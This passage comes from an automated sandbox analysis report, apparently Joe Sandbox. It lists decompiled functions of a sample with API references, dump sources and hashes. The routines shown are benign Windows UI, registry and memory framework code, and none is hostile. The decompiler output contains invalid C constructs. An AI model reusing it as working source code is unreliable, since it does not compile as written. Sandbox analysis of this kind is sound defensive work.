					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E0041F330(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x435374;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x4465c8 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x4465c8 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E0041E5DF(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

0x00404abe
0x00404ac8
0x00404acf
0x00404ad3
0x00404ad4
0x00404ad5
0x00404adb
0x00404ae4
0x00404ae7
0x00404aea
0x004037e3
0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b
0x00404af6
0x00404af9
0x00404afd
0x00404afd
0x00404afe
0x00404b01
0x00404b02
0x00404b04
0x00404b07
0x00404b0c
0x00404b10
0x00404b13
0x00404b15
0x00404b1a
0x00404b1e
0x00404b1e
0x00404b21
0x00404b24
0x00404b26
0x00404b26
0x00404b37
0x00404b3f
0x00404b47
0x00404b4a
0x00404b4d
0x00404b51
0x00404b56
0x00404b59
0x00404b60
0x00404b60
0x00404b64
0x00404b66
0x00404b69
0x00404b6d
0x00404b70
0x00404b72
0x00404b75
0x00404b78
0x00404b78
0x00404b78
0x00404b7d
0x00404b89
0x00404b91
0x00404b92
0x00404b93
0x00404b98
0x00404b99
0x00404ba1
0x00404ba7
0x00404ba7
0x00404bac
0x00404baf
0x00404bb1
0x00404bb6
0x00404bb9
0x00404bb9
0x00404bba
0x00404bba

APIs

GetMenuCheckMarkDimensions.USER32 ref: 00404AD5
_memset.LIBCMT ref: 00404B37
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00404B89
LoadBitmapA.USER32 ref: 00404BA1

Strings

tSC, xrefs: 00404B51
, xrefs: 00404AF6

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID: $tSC
API String ID: 4271682439-84426305
Opcode ID: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
Instruction ID: f93c5f26688163433edc60361cc36291d0a2f72699a6ff0e350c35afdfd69af5
Opcode Fuzzy Hash: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
Instruction Fuzzy Hash: 153109B2A002099FEB10CFB8DC85ABE7BB5EB84304F15043BE602EB2D1D674D945C754

Uniqueness

Uniqueness Score: -1.00%

Function 00418F07, Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00418F07(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E00409C97(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E0040CA70(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E00418F07(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E00409C97(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E00418EB2(_t45, E00409C97(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

0x00418f07
0x00418f07
0x00418f09
0x00418f10
0x00418fb0
0x00418fb4
0x00418fc3
0x00418fc7
0x00418f72
0x00418f82
0x00418fd9
0x00000000
0x00418fd9
0x00418f84
0x00418f85
0x00418f8c
0x00418f9e
0x00418fcd
0x00418fcd
0x00418fce
0x00418fd0
0x00000000
0x00418fd0
0x00418fa0
0x00418fa9
0x00000000
0x00000000
0x00000000
0x00418fab
0x00418fab
0x00418fab
0x00418fac
0x00418fad
0x00418fd1
0x00418fd6
0x00000000
0x00418fd8
0x00418f8c
0x00000000
0x00418fc9
0x00418f25
0x00418f2a
0x00418f5e
0x00418f46
0x00418f4a
0x00000000
0x00418f50
0x00418f59
0x00000000
0x00418f59
0x00418f4a
0x00418f70
0x00000000

APIs

GetWindow.USER32(?,00000002), ref: 00418F22
GetParent.USER32(?), ref: 00418F33
GetWindow.USER32(?,00000002), ref: 00418F56
GetWindow.USER32(?,00000002), ref: 00418F68
GetWindowLongA.USER32 ref: 00418F77
IsWindowVisible.USER32(?), ref: 00418F91
GetTopWindow.USER32(?), ref: 00418FB7

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
Instruction ID: 5631cdc5cc6889daffde78f578d4d612bd2c5089616566f59ea8a3a8e6a984d0
Opcode Fuzzy Hash: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
Instruction Fuzzy Hash: EE21F832A047146BD6206B758C09FEB779DBF84754F050A2EF985A7291DB2CEC41C698

Uniqueness

Uniqueness Score: -1.00%

Function 00406653, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406653(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x0040666e
0x00406675
0x00406678
0x0040667b
0x0040667e
0x00406689
0x004066c0
0x004066c0
0x004066cb
0x004066d0
0x004066d0
0x004066d5
0x004066da
0x004066da
0x004066e3

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00406681
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066A4
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066C0
RegCloseKey.ADVAPI32(?), ref: 004066D0
RegCloseKey.ADVAPI32(?), ref: 004066DA

Strings

software, xrefs: 00406669

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
Instruction ID: bc813771eb951e0115408790e1de8cf4d033a672c96248005cb1173a93d838a7
Opcode Fuzzy Hash: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
Instruction Fuzzy Hash: 4F11F876E01158FBCB21DF9ADD84CEFBFBCEF85750B1040AAA601A2121D2719A14DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F402, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040F402(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E0041F7F4(0, 0);
				_t22 = E0040EAD1(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E004037AF(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E0041F330(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E0041F7C2(_t28);
			}

0x0040f402
0x0040f402
0x0040f402
0x0040f409
0x0040f413
0x0040f41f
0x0040f425
0x0040f42a
0x0040f430
0x0040f432
0x0040f437
0x0040f43d
0x0040f43d
0x0040f445
0x0040f456
0x0040f462
0x0040f467
0x0040f46d
0x0040f470
0x0040f475
0x0040f47f
0x0040f47f
0x0040f482
0x0040f488
0x0040f493

APIs

LeaveCriticalSection.KERNEL32(?), ref: 0040F409
__CxxThrowException@8.LIBCMT ref: 0040F413

Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004), ref: 0040F42A
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437

Part of subcall function 004037AF: __CxxThrowException@8.LIBCMT ref: 004037C3

_memset.LIBCMT ref: 0040F456
TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
Instruction ID: fd93560edbf6851b4f3960d9b72a4f37630a2f2519325dc6941088bc0f039299
Opcode Fuzzy Hash: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
Instruction Fuzzy Hash: DC11C274100605AFCB20AF50DC89C6BBBA9FF54308760C13EF816A25A1CB34AE95CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF21, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EF21(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x0040ef2b
0x0040ef31
0x0040ef38
0x0040ef3f
0x0040ef46
0x0040ef53
0x0040ef5a
0x0040ef5d
0x0040ef60
0x0040ef64

APIs

GetSysColor.USER32(0000000F), ref: 0040EF2D
GetSysColor.USER32(00000010), ref: 0040EF34
GetSysColor.USER32(00000014), ref: 0040EF3B
GetSysColor.USER32(00000012), ref: 0040EF42
GetSysColor.USER32(00000006), ref: 0040EF49
GetSysColorBrush.USER32(0000000F), ref: 0040EF56
GetSysColorBrush.USER32(00000006), ref: 0040EF5D

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
Instruction ID: f59acb6467372613553c355d87f79defc1ce8ae1078b4449624b824b30ee7355
Opcode Fuzzy Hash: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
Instruction Fuzzy Hash: F0F0F871A407489BD730BB729D09B47BAE1EFC4B10F02192ED2818BA90E6B6E0409F44

Uniqueness

Uniqueness Score: -1.00%

Function 00433C38, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433C38() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x44680c =  *0x44680c & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x44680c = _t6;
					return _t6;
				}
			}

0x00433c49
0x00433c53
0x00433c57
0x00433c73
0x00433c73
0x00000000
0x00433c73
0x00433c59
0x00433c5f
0x00000000
0x00000000
0x00000000
0x00433c61
0x00433c61
0x00433c66
0x00433c6c
0x00000000
0x00433c6c

APIs

GetVersion.KERNEL32 ref: 00433C40
GetVersion.KERNEL32 ref: 00433C4B
GetVersion.KERNEL32 ref: 00433C53
GetVersion.KERNEL32 ref: 00433C59
RegisterClipboardFormatA.USER32 ref: 00433C66

Strings

MSWHEEL_ROLLMSG, xrefs: 00433C61

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
Instruction ID: 4356ce2cf077731b6ec7b5d007e1485f223b33f16df30197ff0064379991df0c
Opcode Fuzzy Hash: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
Instruction Fuzzy Hash: 30E04F7B8015135EE7112F69BC043A627945BAE392F56B03B9D01A22509A3C19438EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405957, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405957(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E00405880();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E00403ED6();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x0040595f
0x00405967
0x00405969
0x00405986
0x00405994
0x0040599f
0x004059a1
0x004059a3
0x004059a5
0x004059b0
0x004059b2
0x004059bf
0x004059bf
0x004059c1
0x004059c7
0x004059cb
0x004059e9
0x004059dc
0x004059df
0x004059e1
0x004059e1
0x004059cb
0x004059f2
0x00000000
0x00000000
0x00000000
0x004059a7
0x004059a7
0x004059a8
0x004059aa
0x004059ac
0x00000000
0x004059a7
0x00405999
0x0040599b
0x0040599d
0x00000000
0x00000000
0x00000000
0x0040599d
0x0040596b
0x00405972
0x00405981
0x00405981
0x00000000
0x00405981
0x00405974
0x0040597b
0x00000000
0x00000000
0x0040597d
0x00000000

APIs

GetWindowLongA.USER32 ref: 00405989
GetParent.USER32(00401257), ref: 00405997
GetParent.USER32(00401257), ref: 004059AA
GetLastActivePopup.USER32(00401257), ref: 004059B9
IsWindowEnabled.USER32(00401257), ref: 004059CE
EnableWindow.USER32(00401257,00000000), ref: 004059E1

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
Instruction ID: 0fd042f9c84c3817d672c4b8ef0a745a4829e1649fc024bfe0b5622049980979
Opcode Fuzzy Hash: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
Instruction Fuzzy Hash: 52118CB2605B21DBD6222A699844B6BB69CDF64B70F150136EC00F3395DB78DC019EED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F839, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040F839(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x0040f848
0x0040f854
0x0040f856
0x0040f899
0x0040f899
0x0040f89b
0x0040f89f
0x00000000
0x00000000
0x0040f865
0x0040f87c
0x0040f882
0x0040f894
0x00000000
0x0040f8a7
0x0040f894
0x0040f896
0x0040f898
0x0040f898
0x0040f8a4

APIs

ClientToScreen.USER32(?,?), ref: 0040F848
GetDlgCtrlID.USER32 ref: 0040F85C
GetWindowLongA.USER32 ref: 0040F86A
GetWindowRect.USER32 ref: 0040F87C
PtInRect.USER32(?,?,?), ref: 0040F88C
GetWindow.USER32(?,00000005), ref: 0040F899

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
Instruction ID: f664ab31a6303e9d539a40d152b99c50a5e09be0de03728c9acbdc8a8ff8b10d
Opcode Fuzzy Hash: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
Instruction Fuzzy Hash: E2016236600515ABDB216F94DC08EEF376CEF84751F048136FD11B75A0D738EA158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00410A89, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00410A89(intOrPtr __ebx, void** __ecx, void* __edx, intOrPtr __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				intOrPtr _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x443590; // 0xa920217c
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E004108CC(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E004108F7(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E0041E982(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E00410A0C(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E00410A0C(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E0041E5DF(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x00410a89
0x00410a89
0x00410a89
0x00410a8f
0x00410a96
0x00410a9d
0x00410aa3
0x00410aa6
0x00410aaf
0x00410ab0
0x00410ab9
0x00410ac7
0x00410aca
0x00410ad2
0x00410ae8
0x00410aea
0x00410aed
0x00410af5
0x00410aef
0x00410aef
0x00410aef
0x00410b04
0x00410b82
0x00410b82
0x00410b06
0x00410b1b
0x00410b20
0x00410b23
0x00000000
0x00410b25
0x00410b26
0x00410b2c
0x00410b31
